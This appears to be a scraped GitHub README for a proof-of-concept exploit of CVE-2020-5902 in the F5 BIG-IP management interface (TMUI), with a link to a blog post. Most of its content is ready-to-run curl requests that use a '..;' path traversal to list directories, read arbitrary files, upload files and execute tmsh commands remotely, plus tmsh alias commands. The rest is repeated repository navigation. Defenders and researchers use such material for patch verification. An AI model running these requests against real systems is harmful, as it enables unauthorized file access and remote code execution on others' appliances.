CVE-2020-5902

Proof of Concept for CVE-2020-5902

Blog Post

https://medium.com/@un4gi/from-directory-traversal-to-rce-an-inside-look-at-cve-2020-5902-17bf483e4a9d

List Files

curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/path/here/"

LFI

curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file"

File Upload

curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=<filename>&content=<content>"

Adding tmsh cli Alias

tmsh create cli alias private <aliasname> command "command"

Deleting tmsh cli Alias

tmsh delete cli alias private <aliasname>

RCE

curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>"

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

CVE-2020-5902

Blog Post

List Files

LFI

File Upload

Adding tmsh cli Alias

Deleting tmsh cli Alias

RCE

About

Releases

Packages

un4gi/CVE-2020-5902

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

CVE-2020-5902

Blog Post

List Files

LFI

File Upload

Adding tmsh cli Alias

Deleting tmsh cli Alias

RCE

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages